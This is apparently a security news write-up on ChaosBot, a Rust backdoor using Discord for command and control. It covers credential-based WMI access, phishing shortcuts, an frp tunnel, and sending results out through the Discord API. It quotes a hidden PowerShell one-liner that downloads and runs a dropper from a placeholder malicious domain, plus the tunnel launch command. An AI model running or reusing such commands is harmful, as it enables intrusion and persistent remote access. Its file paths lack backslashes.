“`html
ChaosBot emerged in late September 2025 as an advanced Rust-based backdoor aimed at corporate networks. Preliminary examinations indicated that cybercriminals accessed the systems by taking advantage of compromised CiscoVPN credentials along with excessively privileged Active Directory accounts.
Upon gaining access, ChaosBot was discreetly introduced through side-loading methods utilizing the legitimate Microsoft Edge component identity_helper.exe located in the C:UsersPublicLibraries directory.
The malware’s implementation in Rust and its dependence on Discord for command and control (C2) operations highlight a clever fusion of contemporary development strategies and misappropriated mainstream platforms.
eSentire analysts observed that the individual behind ChaosBot utilized a Discord profile labeled “chaos_00019,” implying an intentional effort to obscure communications within widely used social networks.
The profile of the victims suggests an emphasis on Vietnamese-speaking settings, although attempts at lateral movement across different targets have been documented.
.webp)
The exploitation of VPN credentials along with over-privileged AD accounts paved the way for unobstructed WMI-based remote execution, enabling extensive dissemination prior to detection.
After the initial breach, ChaosBot performs reconnaissance and sets up a fast reverse proxy (frp) tunnel to ensure ongoing access.
The malware retrieves frp along with its configuration file (node.ini) to C:UsersPublicMusic, then activates the proxy through a PowerShell-executed shell command:
powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; C:UsersPublicMusicnode.exe -c C:UsersPublicMusicnode.ini"This procedure establishes a concealed communication channel over port 7000 to a remote AWS server, evading perimeter defenses and facilitating further lateral maneuvers.
Infection Procedure
The fundamental infection method of ChaosBot utilizes two main vectors: credential-based access and harmful Windows shortcuts.
In the first vector, valid CiscoVPN credentials alongside an excessively privileged AD account named “serviceaccount” are employed to execute WMI commands that deliver and run the ChaosBot payload (msedge_elf.dll) on target machines.
The shortcut method involves phishing communications that contain .lnk files designed to invoke a PowerShell one-liner to download and execute ChaosBot, concurrently opening a deceptive PDF styled after the State Bank of Vietnam to divert user attention.
.webp)
This PowerShell command appears as follows:
powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://malicious-domain/dropper.exe' -OutFile $env:Tempchaosbot.exe; Start-Process $env:Tempchaosbot.exe"Upon execution, ChaosBot verifies its internal Discord bot token with a GET request to https://discord.com/api/v10/users/@me, then creates a specific channel named after the victim’s hostname via a POST to https://discord.com/api/v10/guilds/.
Subsequent shell commands retrieved from Discord correspondence are executed in fresh PowerShell processes prefixed with UTF-8 encoding instructions to retain output accuracy.
Results—including stdout, stderr, screenshots, or file attachments—are sent back to the threat actor’s Discord channel via multipart/form-data POST requests.
This dual-vector strategy—credential theft and social engineering through harmful shortcuts—combined with the utilization of authentic services for C2, renders ChaosBot especially difficult to detect and eliminate.
Asset masquerading by means of built-in Windows binaries and meticulous encoding techniques further obscures its footprint within targeted environments.
“`